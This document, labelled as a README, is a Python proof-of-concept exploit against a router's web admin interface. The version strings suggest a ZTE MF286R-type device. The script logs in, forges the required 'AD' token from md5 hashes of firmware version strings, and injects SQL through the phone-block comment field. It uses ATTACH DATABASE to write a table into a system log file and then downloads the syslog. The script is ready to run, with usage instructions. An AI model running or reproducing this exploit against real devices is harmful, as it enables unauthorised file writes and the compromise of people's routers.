README.md
Rendering markdown...
import time
import requests
import hashlib
import sys
import base64
wa_inner_version = "BD_POSTEMF286RMODULEV1.0.0B12"
cr_version = "CR_ITPOSTEMF286RV1.0.0B10"
FORM = lambda x: {"isTest": False, "goformId": x}
s = requests.Session()
def login():
data = FORM("LOGIN")
data["password"] = PASSWD
status = s.post(
f"{HOST}/goform/goform_set_cmd_process",
headers=HDRS,
data=data,
).json()
login_status = "[+] Login: "
login_status += "success" if status["result"] == "0" else "fail"
print(login_status)
def get_AD():
def md5(s):
m = hashlib.md5()
m.update(s.encode("utf-8"))
return m.hexdigest()
a = md5(wa_inner_version + cr_version)
rd = requests.get(
f"{HOST}/goform/goform_get_cmd_process?isTest=false&cmd=RD&_={int(time.time())}",
headers=HDRS,
)
return md5(a + rd.json()["RD"])
def get_response(server_resp):
status = "[+] payload injected: "
if "success" in server_resp.text:
status += "success"
else:
status += "fail"
print(status)
def sqli():
target = "/var/log/webshow_messages"
hostname_form = FORM("PHONE_BLOCK_ADD")
hostname_form["block_number"] = "testestesttest"
hostname_form[
"block_comment"
] = f"test'); ATTACH DATABASE '{target}' AS t; CREATE TABLE t.pwn (dataz text);INSERT INTO t.pwn (dataz) VALUES ('testestesttest');--"
hostname_form["AD"] = get_AD()
a = s.post(
f"{HOST}/goform/goform_set_cmd_process",
headers=HDRS,
data=hostname_form,
)
get_response(a)
def get_log():
logs = s.get(f"{HOST}/cgi-bin/ExportSyslog.sh", headers=HDRS)
if len(logs.text) > 0:
print(logs.text)
print("[+] Logs written into last-log.txt")
with open("last-log.txt", "w") as logf:
logf.write(logs.text)
if __name__ == "__main__":
if len(sys.argv) < 3:
print("usage: python3 run.py http://<router_ip> <admin_password>")
sys.exit(0)
HOST = sys.argv[1]
HDRS = {
"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Origin": HOST,
"Referer": f"{HOST}/index.html",
}
PASSWD = base64.b64encode(sys.argv[2].encode()).decode()
login()
sqli()
get_log()